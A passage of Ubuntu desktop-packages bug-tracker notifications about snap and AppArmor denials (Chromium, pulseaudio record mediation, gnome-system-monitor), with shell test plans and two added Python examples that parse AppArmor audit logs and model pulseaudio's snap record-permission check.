   modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480
  DRM.card0-eDP-1:
   enabled: disabled
   dpms: Off
   status: connected
   edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII=
   modes: 1920x1080
  DiskUsage:
   Filesystem     Type  Size  Used Avail Use% Mounted on
   /dev/sda6      ext4  184G   35G  140G  20% /home
   tmpfs          tmpfs 7,8G  152M  7,7G   2% /dev/shm
   /dev/sda6      ext4  184G   35G  140G  20% /home
  DistroRelease: Ubuntu 19.10
  InstallationDate: Installed on 2017-09-30 (766 days ago)
  InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412)
  Lsusb:
   Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
   Bus 001 Device 004: ID 8087:0a2b Intel Corp.
   Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam
   Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver
   Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
  MachineType: ASUSTeK COMPUTER INC. UX330UAK
  Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1
  PackageArchitecture: amd64
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=<set>
   LANG=de_DE.UTF-8
   SHELL=/bin/bash
  ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7
  ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1
  Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800})
  Snap.ChromiumVersion: Chromium 78.0.3904.70 snap
  Tags: eoan snap
  Uname: Linux 5.3.0-19-generic x86_64
  UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago)
  UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data
  _MarkForUpload: True
  dmi.bios.date: 04/19/2019
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: UX330UAK.315
  dmi.board.asset.tag: ATN123456
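Three of the reports above (the chromium denial that needed aa-decode, the libreoffice complain-mode flood, and the SoloKeys dbus denial) are the same triage job: parse AppArmor audit records, collapse the repeats, and decide what belongs in a profile. The following is an added example written for this page, not tooling from AppArmor, snapd or any of the reports: it parses file (type=1400) and dbus (type=1107, fields nested in msg='...') records, hex-decodes the fields audit encodes when a value contains a space (exactly what aa-decode did above, and only for those fields, so a bare ouid=1000 is never mis-decoded), summarises by subject/decision/operation/target, and proposes read-only rules for non-/home paths in the spirit of the libreoffice comment. SAMPLE_LOG is constructed from the quoted lines; the @{PROC}/@{pid} generalisation of /proc/<pid>/ paths is my choice, not something the reports prescribe.

```python
import re
from collections import Counter

# Constructed sample modelled on the records quoted in the chromium (bug 1864127),
# libreoffice (bug 1849680) and SoloKeys (bug 1851211) reports above: a hex-encoded
# name=, quoted names, complain-mode ALLOWED records, a type=1107 dbus denial
# whose fields sit inside msg='...', and a kernel line that is not an AppArmor record.
SAMPLE_LOG = """\
audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000
audit: type=1400 audit(1571920851.001:3672): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1571920851.001:3673): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/usr/share/drirc.d/00-mesa-defaults.conf" pid=17792 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
audit: type=1400 audit(1571920851.005:3675): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/home/chris/.cache/mesa_shader_cache/index" pid=17792 comm="soffice.bin" requested_mask="wrc" denied_mask="wrc" fsuid=1000 ouid=1000
kauditd_printk_skb: 1210 callbacks suppressed
audit: type=1400 audit(1571923862.923:4896): apparmor="ALLOWED" operation="open" profile="libreoffice-soffice" name="/proc/18541/mountinfo" pid=18541 comm="soffice.bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=1000
audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
"""

# key=value pairs: double-quoted, single-quoted (the msg='...' wrapper) or bare.
_KV = re.compile(r'''(\w+)=(?:"([^"]*)"|'([^']*)'|(\S+))''')
# audit hex-encodes only these fields, so the name is checked as well as the shape.
_HEX_FIELDS = {"name", "proctitle", "cwd", "comm", "exe"}
_HEX = re.compile(r"^(?:[0-9A-F]{2})+$")
_PID_PATH = re.compile(r"^/proc/\d+/")


def _kv(text):
    out = {}
    for m in _KV.finditer(text):
        key, dq, sq, bare = m.groups()
        if dq is not None:
            out[key] = dq
        elif sq is not None:
            out[key] = sq
        elif key in _HEX_FIELDS and _HEX.match(bare):
            out[key] = bytes.fromhex(bare).decode("utf-8", "replace")  # what aa-decode does
        else:
            out[key] = bare
    return out


def parse_audit(text):
    """One dict per AppArmor record; lines without apparmor="..." are skipped and
    the fields nested inside msg='...' are hoisted to the top level."""
    records = []
    for line in text.splitlines():
        if 'apparmor="' not in line:
            continue
        rec = _kv(line)
        msg = rec.pop("msg", None)
        if msg is not None:
            rec.update(_kv(msg))
        records.append(rec)
    return records


def summarize(records):
    """(subject, decision, operation, target, mask) -> count, so a flood of
    identical records collapses to one line each."""
    counts = Counter()
    for r in records:
        subject = r.get("profile") or r.get("label", "?")
        target = r.get("name", "?")
        if r.get("operation", "").startswith("dbus_"):
            target = f'{r.get("bus")} bus {r.get("name")} {r.get("interface")}.{r.get("member")}'
        mask = r.get("denied_mask") or r.get("mask", "")
        counts[(subject, r.get("apparmor"), r.get("operation"), target, mask)] += 1
    return counts


def suggest_read_rules(records, profile):
    """Candidate rules in the spirit of the libreoffice comment: only complain-mode
    (ALLOWED) file accesses that are read-only and outside /home. Writes, and
    anything under /home, are deliberately left for a human to judge."""
    rules = set()
    for r in records:
        if r.get("profile") != profile or r.get("apparmor") != "ALLOWED":
            continue
        name, mask = r.get("name", ""), r.get("denied_mask", "")
        if not name.startswith("/") or name.startswith("/home/") or set(mask) != {"r"}:
            continue
        path = _PID_PATH.sub("@{PROC}/@{pid}/", name)
        rules.add(path + " r,")
    return sorted(rules)


if __name__ == "__main__":
    recs = parse_audit(SAMPLE_LOG)
    for key, n in sorted(summarize(recs).items(), key=lambda kv: -kv[1]):
        print(f"{n:4d}  " + "  ".join(str(k) for k in key))
    print("\n".join(suggest_read_rules(recs, "libreoffice-soffice")))
```

Feed it `journalctl -k` or `dmesg` output instead of SAMPLE_LOG and the summary is what you paste into a bug report; the suggested rules are a starting point to be reviewed, not something to append to a profile blindly, since a read of a world-readable file under /usr is cheap to grant while the /home write in the sample (the mesa shader cache) is the kind of access that needs an `owner` rule and a decision.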
[Desktop-packages] [Bug 1855477] Re: gnome-control-center will not let me paste in a password from my password manger
Thank you for using Ubuntu and reporting a bug. Are you using Wayland or Xorg for your desktop session? What password manager are you using?

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to gnome-control-center in Ubuntu.
https://bugs.launchpad.net/bugs/1855477

Title:
  gnome-control-center will not let me paste in a password from my password manger

Status in gnome-control-center package in Ubuntu:
  New

Bug description:
  Gnome-control-center online-accounts will not let me paste my google password in. Since I use long secure complex passwords, typing in passwords is not a viable option. Please fix this bug.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-control-center/+bug/1855477/+subscriptions

-- 
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
https://github.com/snapcore/snapd/pull/7779

** Also affects: snapd
   Importance: Undecided
       Status: New

** Changed in: snapd (Ubuntu)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: snapd
   Importance: Undecided => Low

** Changed in: snapd
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: snapd
    Milestone: None => 2.42.3

** Changed in: snapd (Ubuntu)
       Status: In Progress => Triaged

** Changed in: snapd
       Status: New => In Progress

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title:
  [snap] Permission denied on Private encrypted folder

Status in AppArmor:
  Triaged
Status in snapd:
  In Progress
Status in chromium-browser package in Ubuntu:
  Invalid
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

  Package: chromium-browser
  Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions

-- 
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
https://github.com/snapcore/snapd/pull/7779

** Also affects: snapd
   Importance: Undecided
       Status: New

** Changed in: snapd
       Status: New => In Progress

** Changed in: snapd
   Importance: Undecided => Medium

** Changed in: snapd
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: snapd (Ubuntu)
       Status: In Progress => Triaged

** Changed in: snapd (Ubuntu)
   Importance: Undecided => Medium

** Changed in: snapd (Ubuntu)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

** Changed in: snapd
    Milestone: None => 2.42.3

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title:
  [snap] SoloKeys not supported by u2f-devices interface

Status in snapd:
  In Progress
Status in chromium-browser package in Ubuntu:
  Confirmed
Status in snapd package in Ubuntu:
  Triaged

Bug description:
  This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open. No chance to use such a key in the browser.

  dmesg output is:

  My dmesg output shows a lot of DENIED:
  audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:8.0-0ubuntu3.11 from xenial-proposed, the test plan and James' addition for mediation being preserved across snapd restart all work as expected. Marking as verification done.

** Description changed:

  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected being able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then, when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (i.e., its security label (i.e., apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes"  # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes"  # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current  # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes"  # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes
+ 
+ $ exit  # out of snap run --shell

  For strict snaps with pulseaudio:
  $ sudo snap install test-snapd-pulseaudio --edge
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help  # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected, which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes  # should pass
  ...
  ^Cyes
  $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
  ...
  yes

  For strict snaps with audio-playback/audio-record:
  $ sudo snap refresh core --candidate  # make sure have 2.41. 'install' on 16.04
  $ sudo snap install test-snapd-audio-record --edge
  $ snap connections test-snapd-audio-record  # record not connected
  Interface       Plug                                    Slot             Notes
  audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
  audio-record    test-snapd-audio-record:audio-record    -                -
  $ test-snapd-audio-record.play --help  # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-record/common/
  $ test-snapd-audio-record.play
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Installing 1:11.1-1ubuntu7.5 from bionic-proposed, the test plan and James' addition for mediation being preserved across snapd restart all work as expected. Marking as verification done.

** Tags removed: verification-needed-bionic
** Tags added: verification-done-bionic

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title:
  please enable snap mediation support

Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Xenial:
  Fix Committed
Status in pulseaudio source package in Bionic:
  Fix Committed

Bug description:
  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected being able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed:

  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected being able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then, when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (i.e., its security label (i.e., apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes"  # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes"  # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current  # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes"  # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For strict snaps with pulseaudio:
- $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap
+ $ sudo snap install test-snapd-pulseaudio --edge
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help  # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected, which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes  # should pass
  ...
  ^Cyes
  $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
  ...
  yes

  For strict snaps with audio-playback/audio-record:
  $ sudo snap refresh core --candidate  # make sure have 2.41. 'install' on 16.04
- $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap
+ $ sudo snap install test-snapd-audio-record --edge
  $ snap connections test-snapd-audio-record  # record not connected
  Interface       Plug                                    Slot             Notes
  audio-playback  test-snapd-audio-record:audio-playback  :audio-playback  -
  audio-record    test-snapd-audio-record:audio-record    -                -
  $ test-snapd-audio-record.play --help  # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio-record/common/
  $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes
  xcb_connection
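The record-access rule in the [Impact] section above (the same description appears in the other copies of this bug in the thread) reads as a small decision procedure: non-snap clients keep their old behaviour, classic snaps are allowed, strict snaps are allowed only with the pulseaudio or audio-record plug connected. The following is an added example written for this thread, not the pulseaudio module's code: snapd's control-socket answers are replaced by an in-memory table of constructed snaps (the names match the ones in the test plan), and the choice to refuse a snap-labelled client that snapd does not know is this example's own assumption.

```python
"""Model of pulseaudio's snap record mediation as described in bug 1781428.

Added example for this thread. It does not talk to snapd: the answers the
module would get over snapd's control socket (confinement and connected
interfaces) come from FAKE_SNAPD, a constructed table.
"""
from dataclasses import dataclass, field


@dataclass
class SnapInfo:
    """What the module needs from snapd for one snap (constructed stand-in)."""
    confinement: str                       # "strict", "classic" or "devmode"
    connected: set = field(default_factory=set)   # interfaces with a connected plug


# Constructed sample data mirroring the test plan's three snaps.
FAKE_SNAPD = {
    "test-snapd-classic-confinement": SnapInfo("classic"),
    "test-snapd-pulseaudio": SnapInfo("strict", {"pulseaudio"}),
    "test-snapd-audio-record": SnapInfo("strict", {"audio-playback"}),
}

# Either of these connected plugs permits recording for a strict snap.
RECORD_INTERFACES = {"pulseaudio", "audio-record"}


def snap_name_from_label(label):
    """Return the snap name from an AppArmor label such as
    'snap.test-snapd-pulseaudio.record (enforce)', or None for non-snap labels."""
    label = label.split(" ")[0]            # drop the "(enforce)"/"(complain)" mode suffix
    if not label.startswith("snap."):
        return None
    parts = label.split(".")               # snap.<snap-name>.<app-name>
    return parts[1] if len(parts) >= 3 else None


def may_record(label, snapd=FAKE_SNAPD):
    """Decide whether a client with this security label may open a record stream."""
    name = snap_name_from_label(label)
    if name is None:
        return True                        # unconfined or non-snap profile: not mediated here
    info = snapd.get(name)
    if info is None:
        return False                       # assumption: fail closed if snapd does not know the snap
    if info.confinement == "classic":
        return True                        # classic snaps may record (bug 1787324)
    return bool(info.connected & RECORD_INTERFACES)


def may_play(label, snapd=FAKE_SNAPD):
    """Playback is allowed for every client that could reach the socket at all."""
    return True


if __name__ == "__main__":
    for lbl in ("unconfined",
                "snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
                "snap.test-snapd-pulseaudio.record (enforce)",
                "snap.test-snapd-audio-record.record (enforce)"):
        print(f"{lbl:80} play={may_play(lbl)} record={may_record(lbl)}")
```

Connecting the audio-record plug of test-snapd-audio-record (the last step of the test plan) corresponds to adding "audio-record" to that entry's connected set, after which may_record flips to True without any change to the decision code.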
[Desktop-packages] [Bug 1851211] Re: [snap] SoloKeys not supported by u2f-devices interface
** Changed in: snapd (Ubuntu)
       Status: Triaged => In Progress

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1851211

Title:
  [snap] SoloKeys not supported by u2f-devices interface

Status in chromium-browser package in Ubuntu:
  Confirmed
Status in snapd package in Ubuntu:
  In Progress

Bug description:
  This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1738164 it is still open. No chance to use such a key in the browser.

  dmesg output is:

  My dmesg output shows a lot of DENIED:
  audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?'
[Desktop-packages] [Bug 1778332] Re: Apparmor Permission Denied (apparmor="DENIED")
Clement, your issue is different than Charles'. More information is required from you to triage your issue.

-- 
You received this bug notification because you are a member of Desktop
Packages, which is subscribed to gnome-system-monitor in Ubuntu.
https://bugs.launchpad.net/bugs/1778332

Title:
  Apparmor Permission Denied (apparmor="DENIED")

Status in gnome-system-monitor package in Ubuntu:
  Expired

Bug description:
  I try to launch the system monitor but nothing shows up.

  journalctl -f
  Result:
  Jun 23 19:04:24 laptop-hostname audit[8109]: AVC apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid"
  Jun 23 19:04:24 laptop-hostname kernel: audit: type=1400 audit(1529751864.744:47): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=8109 comm="3" capability=6 capname="setgid"
  Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted
  Jun 23 19:04:24 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[8097]: snap-update-ns failed with code 1: File exists
  Jun 23 19:04:28 laptop-hostname pkexec[8128]: pam_unix(polkit-1:session): session opened for user root by (uid=1000)

  /var/log/syslog
  Result:
  Jun 23 19:03:17 laptop-hostname kernel: [  433.266715] audit: type=1400 audit(1529751797.796:42): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/snap/gnome-system-monitor/45/gnome-platform/" pid=7471 comm="3" srcname="/snap/gnome-3-26-1604/64/" flags="rw, bind"
  Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.799121 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/snap/gnome-3-26-1604/64 /snap/gnome-system-monitor/45/gnome-platform none bind,ro 0 0): permission denied
  Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.833637 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/local/share/fonts /usr/local/share/fonts none bind,ro 0 0): permission denied
  Jun 23 19:03:17 laptop-hostname kernel: [  433.301209] audit: type=1400 audit(1529751797.828:43): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/local/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind"
  Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.835300 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/usr/share/fonts /usr/share/fonts none bind,ro 0 0): permission denied
  Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: 2018/06/23 19:03:17.838094 main.go:192: cannot change mount namespace of snap "gnome-system-monitor" according to change mount (/var/lib/snapd/hostfs/var/cache/fontconfig /var/cache/fontconfig none bind,ro 0 0): permission denied
  Jun 23 19:03:17 laptop-hostname kernel: [  433.302850] audit: type=1400 audit(1529751797.832:44): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/usr/share/fonts/" pid=7471 comm="3" flags="ro, remount, bind"
  Jun 23 19:03:17 laptop-hostname kernel: [  433.305652] audit: type=1400 audit(1529751797.832:45): apparmor="DENIED" operation="mount" info="failed srcname match" error=-13 profile="snap-update-ns.gnome-system-monitor" name="/var/cache/fontconfig/" pid=7471 comm="3" flags="ro, remount, bind"
  Jun 23 19:03:17 laptop-hostname kernel: [  433.336540] audit: type=1400 audit(1529751797.864:46): apparmor="DENIED" operation="capable" profile="snap-update-ns.gnome-system-monitor" pid=7478 comm="3" capability=6 capname="setgid"
  Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: cannot update snap namespace: cannot drop supplementary groups: operation not permitted
  Jun 23 19:03:17 laptop-hostname gnome-system-monitor_gnome-system-monitor.desktop[7456]: snap-update-ns failed with code 1
  Jun 23 19:03:18 laptop-hostname PackageKit: resolve transaction /260_bebcecdc from uid 1000 finished with success after 610ms

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1778332/+subscriptions

-- 
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
